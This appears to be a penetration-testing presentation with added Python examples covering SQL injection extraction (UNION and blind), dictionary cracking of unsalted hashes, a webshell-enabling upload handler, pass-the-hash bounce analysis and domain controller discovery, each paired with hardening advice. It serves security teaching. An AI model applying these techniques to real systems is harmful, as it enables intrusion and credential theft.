3 What is a pentest?
Simulation of a real attack on:
- infrastructure, by exploiting badly designed firewall rules, exposed services, ...
- exposed web applications, by testing user inputs, application bugs, ...
Mainly from two points of view:
- black box: no information about the remote infrastructure, just a URL
- grey box: with a user account
Various purposes:
- security assessment
- decision-maker awareness
- technical staff awareness
3/28

5 Security assessment (2/3)
A pentest should not be mistaken for vulnerability scanning or vulnerability assessment.
Vulnerability scanning (Qualys, Rapid7, Nessus, ...) is cheap and automated, but:
- results are not confirmed by a human assessor
- it does not necessarily prove that a vulnerability is present and actually exploitable (lots of "might/could be vulnerable" in reports)
- it cannot look for tricky vulnerabilities in web applications in an efficient and useful way
- it cannot bounce (from a compromised system to a vulnerable one) to prove that more systems are at risk
- it has no notion of business risk (all vulnerabilities are treated the same)
- scanners are tools for regulatory compliance, not the tools hackers use to penetrate systems
This presentation is about real pentests, simulating real-world attacks.

8 Decision-maker awareness
Pentests are not relevant only to technical staff. Decision makers want to know:
- Do we have vulnerabilities?
- Are they easy to exploit?
- Are they easy to fix?
- How good (or bad) are we compared with similar companies?

9 Case study
A single piece of information was provided to the pentesters:

10 At first sight

11 Guessing the infrastructure...

12 After browsing for a few minutes

13 What does it look like now?

14 SQL injection issue
Possibility to extract database information:
- using a custom script
- no sensitive information on such a website...
- ...except for the user accounts authorized to edit content
Demonstration
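The extraction step the slide demonstrates live, written out as an added example (this is not code from the HSC slides). It uses a constructed in-memory SQLite database with a public articles table and the users table of content editors, and shows the injectable query built by string concatenation, a UNION-based dump for the case where query results are reflected in the page, a boolean-blind extraction (the "custom script" case) for when they are not, and the hardened query with a bound parameter. Table names, logins, passwords and the unsalted-MD5 storage are assumptions made for the demo.

```python
"""SQL injection against a public article page: vulnerable query, two extraction
techniques and the hardened query. Added example; schema and data are constructed."""
import hashlib
import sqlite3


def build_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        CREATE TABLE users (id INTEGER PRIMARY KEY, login TEXT, pwhash TEXT);
        INSERT INTO articles VALUES (1, 'Welcome', 'Public home page');
        INSERT INTO articles VALUES (2, 'News', 'More public text');
    """)
    # Constructed editor accounts; unsalted MD5 is an assumption about the app.
    for login, pw in (("webmaster", "azerty"), ("editor", "Th1s!sStr0nger")):
        con.execute("INSERT INTO users (login, pwhash) VALUES (?, ?)",
                    (login, hashlib.md5(pw.encode()).hexdigest()))
    return con


def get_article_vulnerable(con, article_id: str):
    """The ?id= parameter is concatenated into the statement: injectable."""
    return con.execute(
        f"SELECT title, body FROM articles WHERE id = {article_id}").fetchall()


def get_article_safe(con, article_id: str):
    """Validate the type, then bind the value: user text never reaches the SQL parser."""
    if not article_id.isdigit():
        raise ValueError("article id must be an integer")
    return con.execute("SELECT title, body FROM articles WHERE id = ?",
                       (int(article_id),)).fetchall()


def dump_users_union(fetch) -> dict:
    """Results are reflected in the page: UNION the two-column users table into the
    article query. id = 0 matches no article, so only the injected rows come back."""
    return dict(fetch("0 UNION SELECT login, pwhash FROM users"))


def extract_blind(fetch, login: str, length: int = 32,
                  alphabet: str = "0123456789abcdef") -> str:
    """Results are not reflected; only 'article shown or not' is observable.
    Recover the hash one character at a time with a boolean condition."""
    recovered = ""
    for pos in range(1, length + 1):
        for c in alphabet:
            cond = (f"1 AND substr((SELECT pwhash FROM users WHERE login='{login}'),"
                    f"{pos},1)='{c}'")
            if fetch(cond):          # non-empty result set means the condition held
                recovered += c
                break
        else:
            raise RuntimeError(f"no character matched at position {pos}")
    return recovered


if __name__ == "__main__":
    con = build_db()
    vuln = lambda p: get_article_vulnerable(con, p)
    print("UNION dump :", dump_users_union(vuln))
    print("blind dump :", extract_blind(vuln, "webmaster"))
    try:
        get_article_safe(con, "0 UNION SELECT login, pwhash FROM users")
    except ValueError as e:
        print("hardened   :", e)
```

The blind routine needs up to 16 requests per hex character (512 for one MD5), which is why it is scripted rather than done by hand; against a real target, add a delay and watch for error pages that would make the "true/false" signal ambiguous.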

15 In the vulnerabilities summary...
Looks like an SQL injection flaw!

16 Weak password policy
The retrieved account passwords are not stored in clear: they are hashed (loosely called "one-way encryption").
If some of them are simple, they can be recovered!
Demonstration
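What "simple passwords can be recovered" looks like in practice, as an added example (not the slides' demo code): a dictionary attack with a few mangling rules against a constructed dump of unsalted hashes. Logins, passwords, the word list and the unsalted-MD5 storage are assumptions. It also shows why the absence of a salt matters twice: one hash computation tests every account at once, and identical hashes reveal shared passwords before any cracking.

```python
"""Dictionary attack with simple mangling against unsalted password hashes.
Added example; the dump, word list and hash algorithm are constructed/assumed."""
import hashlib
from typing import Dict, Iterable, Iterator, List

# Constructed dump: login -> unsalted MD5 hex digest, as pulled out via the injection.
DUMP: Dict[str, str] = {
    "webmaster": hashlib.md5(b"azerty").hexdigest(),
    "backup": hashlib.md5(b"azerty").hexdigest(),        # same password as webmaster
    "intern": hashlib.md5(b"Welcome2010").hexdigest(),
    "editor": hashlib.md5(b"Th1s!sStr0nger").hexdigest(),
}

WORDLIST = ["123456", "password", "azerty", "admin", "welcome", "letmein", "hsc"]


def mangle(word: str) -> Iterator[str]:
    """A few of the rules real crackers apply: case variants and common suffixes."""
    for base in (word, word.capitalize(), word.upper()):
        yield base
        for suffix in ("1", "123", "!", "2010"):
            yield base + suffix


def crack(dump: Dict[str, str], wordlist: Iterable[str], algo: str = "md5") -> Dict[str, str]:
    """Return login -> recovered password for every hash matched from the word list."""
    # Invert the dump: with no salt, one digest per candidate checks every account.
    by_hash: Dict[str, List[str]] = {}
    for login, h in dump.items():
        by_hash.setdefault(h.lower(), []).append(login)
    found: Dict[str, str] = {}
    for word in wordlist:
        for cand in mangle(word):
            h = hashlib.new(algo, cand.encode()).hexdigest()
            for login in by_hash.get(h, ()):
                found[login] = cand
    return found


def shared_passwords(dump: Dict[str, str]) -> Dict[str, List[str]]:
    """Without a salt, identical hashes mean identical passwords, even before cracking."""
    groups: Dict[str, List[str]] = {}
    for login, h in dump.items():
        groups.setdefault(h.lower(), []).append(login)
    return {h: logins for h, logins in groups.items() if len(logins) > 1}


if __name__ == "__main__":
    found = crack(DUMP, WORDLIST)
    for login, pw in found.items():
        print(f"{login}: {pw}")
    print("not cracked:", sorted(set(DUMP) - set(found)))
    print("shared     :", list(shared_passwords(DUMP).values()))
```

Three of the four accounts fall to a seven-word list; the one with a long mixed-character password survives. A per-user salt and a slow hash (bcrypt, scrypt or PBKDF2 with a high iteration count) would force the attacker to pay the full cost for each account separately, which is the fix the "weak password policy" finding should recommend alongside a minimum password strength.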

19 No filtering on file extensions (2/2)
Instead of uploading an image, let's upload an executable ASP script, which can act as an interface to the operating system.
- Public webshells are easy to find (c99.php, r57.php, ...)
- HSC consultants developed their own webshell
Demonstration
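The upload handler that makes this possible, beside a hardened one, as an added example (not code from the slides or from HSC). The vulnerable function stores whatever name and bytes the client sent under the web root, which is all it takes to drop a webshell. The hardened one keeps an allow-list of image extensions, checks the file signature, discards the client-supplied name and writes to a directory the web server never executes from. The webshell bytes, file names and directories are constructed.

```python
"""File upload with no extension filtering, next to a hardened handler.
Added example; the webshell stand-in and names below are constructed."""
import os
import secrets
import tempfile

# Allowed extension -> expected leading bytes (file signature).
ALLOWED_IMAGES = {
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
}


def save_upload_vulnerable(webroot: str, client_name: str, data: bytes) -> str:
    """No filtering at all: shell.asp lands in the web root and the server executes it."""
    path = os.path.join(webroot, os.path.basename(client_name))
    with open(path, "wb") as f:
        f.write(data)
    return path


def save_upload_hardened(store: str, client_name: str, data: bytes) -> str:
    """Allow-list + content check + server-chosen name, written to a non-executable store."""
    ext = client_name.rsplit(".", 1)[-1].lower() if "." in client_name else ""
    if ext not in ALLOWED_IMAGES:
        raise ValueError(f"extension {ext!r} is not an allowed image type")
    if not data.startswith(ALLOWED_IMAGES[ext]):
        raise ValueError("file content does not match the claimed image type")
    # The client's name is never reused, so tricks such as 'shell.asp;.jpg'
    # (parsed as ASP by IIS 6) or double extensions cannot survive the upload.
    name = f"{secrets.token_hex(16)}.{ext}"
    path = os.path.join(store, name)
    with open(path, "wb") as f:
        f.write(data)
    return path


def demo() -> dict:
    """Run both handlers against a webshell and a real image; return what happened."""
    webshell = b"<% ' constructed stand-in for ASP code that runs OS commands %>"
    results = {}
    with tempfile.TemporaryDirectory() as webroot, tempfile.TemporaryDirectory() as store:
        results["vuln:shell.asp"] = os.path.basename(
            save_upload_vulnerable(webroot, "shell.asp", webshell))
        for name, data in (("shell.asp", webshell),
                           ("shell.asp;.jpg", webshell),   # IIS 6 semicolon trick
                           ("shell.jpg", webshell)):       # lies about its type
            try:
                save_upload_hardened(store, name, data)
                results[name] = "accepted"
            except ValueError as e:
                results[name] = f"rejected: {e}"
        saved = save_upload_hardened(store, "photo.gif", b"GIF89a" + b"\x00" * 16)
        results["photo.gif"] = os.path.basename(saved)
    return results


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k:18} -> {v}")
```

The signature check only stops files that do not look like images at all; a valid GIF with script code appended still passes it. The control that actually closes the finding is the last one: uploads are served from a location where the web server never executes scripts, so even a polyglot is delivered as a plain image.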

20 In the vulnerabilities summary...

21 Where are we now?

22 Bounce to the SQL Server
- The LocalSystem user can extract password hashes from the system
- Public tools exist (fgdump.exe), but also private ones (forestdump for HSC)
- Such hashes can be broken using rainbow tables
- If a local account is shared across servers, we can bounce to them!
Demonstration
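The check behind "a local account shared across servers", as an added example (not HSC's tooling): it parses the pwdump-style lines that fgdump and similar tools emit (`user:rid:lm_hash:nt_hash:::`) from several hosts and reports, first, accounts whose NT hash is identical on more than one host, the bounce condition, and second, accounts that still have an LM hash stored, the case where a rainbow table gives the clear-text password in minutes. Host names and every hash value below are constructed; the two well-known constants (empty LM field, NT hash of the empty password) are real.

```python
"""Correlate dumped local account hashes across hosts. Added example;
the dumps are constructed, only the two well-known constants are real values."""
from collections import defaultdict
from typing import Dict, List, Tuple

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM field when no LM hash is stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of the empty password

# Constructed dumps, one per host (hash values are made up for the demo).
DUMPS: Dict[str, str] = {
    "WEB01": """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1005:1122334455667788112233445566778:fedcba9876543210fedcba9876543210:::
""",
    "SQL01": """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
sqlsvc:1010:aad3b435b51404eeaad3b435b51404ee:abcdefabcdefabcdefabcdefabcdefab:::
""",
    "FILE01": """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:00000000000000000000000000000001:::
svc_backup:1007:1122334455667788112233445566778:fedcba9876543210fedcba9876543210:::
""",
}


def parse_pwdump(text: str) -> List[Tuple[str, int, str, str]]:
    """Return (user, rid, lm, nt) per line; the trailing ':::' fields are ignored."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) < 4:
            raise ValueError(f"malformed pwdump line: {line!r}")
        user, rid, lm, nt = parts[0], int(parts[1]), parts[2].lower(), parts[3].lower()
        if len(nt) != 32:
            raise ValueError(f"bad NT hash length for {user}: {nt!r}")
        records.append((user, rid, lm, nt))
    return records


def shared_accounts(dumps: Dict[str, str], min_hosts: int = 2) -> Dict[Tuple[str, str], List[str]]:
    """(user, nt_hash) -> hosts on which that exact credential is valid."""
    seen: Dict[Tuple[str, str], List[str]] = defaultdict(list)
    for host, text in dumps.items():
        for user, _rid, _lm, nt in parse_pwdump(text):
            if nt == EMPTY_NT:
                continue            # empty password: a finding of its own, not a bounce path
            seen[(user.lower(), nt)].append(host)
    return {k: sorted(v) for k, v in seen.items() if len(v) >= min_hosts}


def lm_hashes_present(dumps: Dict[str, str]) -> List[Tuple[str, str]]:
    """(host, user) pairs whose LM hash is stored: trivial to crack with rainbow tables."""
    return sorted((host, user)
                  for host, text in dumps.items()
                  for user, _rid, lm, _nt in parse_pwdump(text)
                  if lm != EMPTY_LM)


if __name__ == "__main__":
    for (user, nt), hosts in shared_accounts(DUMPS).items():
        print(f"shared: {user} ({nt[:8]}...) valid on {', '.join(hosts)}")
    for host, user in lm_hashes_present(DUMPS):
        print(f"LM hash stored: {host}\\{user}")
```

Note that the NT hash alone is enough to authenticate to the next host over SMB (pass-the-hash), so the bounce does not even require cracking. The corresponding fixes are a unique local administrator password per server and disabling LM hash storage, which also removes the rainbow-table shortcut.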

23 In the vulnerabilities summary...

24 Where are we now?

25 Compromising the Active Directory
Domain controllers can be identified by querying a DNS SRV record:

    $ dig _ldap._tcp.dc._msdcs.hsc.local SRV
    [...]
    ;; ANSWER SECTION:
    _ldap._tcp.dc._msdcs.hsc.local. 600 IN SRV win2003-ad.hsc.local.
    ;; ADDITIONAL SECTION:
    win2003-ad.hsc.local IN A

If a critical vulnerability hasn't yet been patched, it can be exploited to take control of the system:
MS (netapi), MS (netapi), MS10-046 (LNK), ...
Demonstration
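The same lookup done without dig, as an added example (not code from the slides): it builds the SRV query for `_ldap._tcp.dc._msdcs.<domain>`, parses SRV answers and the A glue records from a wire-format DNS response, and lists the domain controllers with their addresses. The response used offline is constructed (target `win2003-ad.hsc.local`, port 389 and address 10.0.0.5 are assumptions); passing a resolver address sends the real query over UDP.

```python
"""Locate domain controllers via the _ldap._tcp.dc._msdcs SRV record.
Added example; the offline response is constructed."""
import socket
import struct
import sys
from typing import Dict, List, Optional, Tuple

TYPE_A, TYPE_SRV, CLASS_IN = 1, 33, 1


def dc_record_name(domain: str) -> str:
    return f"_ldap._tcp.dc._msdcs.{domain.strip('.')}"


def encode_name(name: str) -> bytes:
    return b"".join(bytes([len(l)]) + l.encode("ascii")
                    for l in name.strip(".").split(".")) + b"\x00"


def build_query(domain: str, txid: int) -> bytes:
    header = struct.pack(">HHHHHH", txid, 0x0100, 1, 0, 0, 0)   # RD set, one question
    return header + encode_name(dc_record_name(domain)) + struct.pack(">HH", TYPE_SRV, CLASS_IN)


def read_name(msg: bytes, off: int) -> Tuple[str, int]:
    """Decode a name, following RFC 1035 compression pointers; return (name, next offset)."""
    labels, end = [], None
    while True:
        length = msg[off]
        if length & 0xC0 == 0xC0:
            if end is None:
                end = off + 2                     # resume after the pointer
            off = struct.unpack(">H", msg[off:off + 2])[0] & 0x3FFF
            continue
        off += 1
        if length == 0:
            break
        labels.append(msg[off:off + length].decode("ascii"))
        off += length
    return ".".join(labels), (end if end is not None else off)


def parse_response(msg: bytes, txid: int) -> Tuple[List[dict], Dict[str, str]]:
    rid, flags, qd, an, ns, ar = struct.unpack(">HHHHHH", msg[:12])
    if rid != txid:
        raise ValueError("transaction id mismatch")
    if flags & 0xF:
        raise ValueError(f"DNS error, RCODE {flags & 0xF}")
    off = 12
    for _ in range(qd):                            # skip the echoed question
        _, off = read_name(msg, off)
        off += 4
    srv, addrs = [], {}
    for _ in range(an + ns + ar):                  # answer, authority, additional
        name, off = read_name(msg, off)
        rtype, _rclass, ttl, rdlen = struct.unpack(">HHIH", msg[off:off + 10])
        off += 10
        if rtype == TYPE_SRV:
            prio, weight, port = struct.unpack(">HHH", msg[off:off + 6])
            target, _ = read_name(msg, off + 6)
            srv.append({"priority": prio, "weight": weight, "port": port,
                        "target": target, "ttl": ttl})
        elif rtype == TYPE_A and rdlen == 4:
            addrs[name] = socket.inet_ntoa(msg[off:off + 4])
        off += rdlen
    return srv, addrs


def constructed_response(domain: str, txid: int) -> bytes:
    """Offline stand-in for a resolver's answer: one SRV record plus its A glue."""
    target = f"win2003-ad.{domain}"
    header = struct.pack(">HHHHHH", txid, 0x8180, 1, 1, 0, 1)
    question = encode_name(dc_record_name(domain)) + struct.pack(">HH", TYPE_SRV, CLASS_IN)
    srv_rdata = struct.pack(">HHH", 0, 100, 389) + encode_name(target)
    answer = b"\xc0\x0c" + struct.pack(">HHIH", TYPE_SRV, CLASS_IN, 600, len(srv_rdata)) + srv_rdata
    glue = encode_name(target) + struct.pack(">HHIH", TYPE_A, CLASS_IN, 600, 4) + socket.inet_aton("10.0.0.5")
    return header + question + answer + glue


def find_domain_controllers(domain: str, resolver: Optional[str] = None, txid: int = 0x1234) -> List[dict]:
    query = build_query(domain, txid)
    if resolver:
        with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
            s.settimeout(3)
            s.sendto(query, (resolver, 53))
            msg = s.recv(4096)
    else:
        msg = constructed_response(domain, txid)
    srv, addrs = parse_response(msg, txid)
    ordered = sorted(srv, key=lambda r: (r["priority"], -r["weight"]))
    return [dict(r, address=addrs.get(r["target"])) for r in ordered]


if __name__ == "__main__":
    domain = sys.argv[1] if len(sys.argv) > 1 else "hsc.local"
    resolver = sys.argv[2] if len(sys.argv) > 2 else None
    for dc in find_domain_controllers(domain, resolver):
        print(f"{dc['target']} {dc['address'] or '?'} port {dc['port']} priority {dc['priority']}")
```

Run as `python3 dclocate.py hsc.local 10.0.0.1` from inside the network to query the real resolver; with no resolver argument it parses the constructed response. The record is readable by any domain member, so this is the first thing done after the bounce: it turns "somewhere on this network there is a domain" into a list of hosts to check for the missing patches.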

26 In the vulnerabilities summary...

27 Where are we now?

28 Conclusion
- Increasing number of attacks against web applications
- A vulnerability can be created by mistake very quickly: unfiltered user input, weak passwords, unpatched software
- Exploitation techniques are now mature
- Impact can be disastrous: leak of confidential data; servers and applications compromised or vandalized
- Pentests make you aware of the issues before the real hackers do...
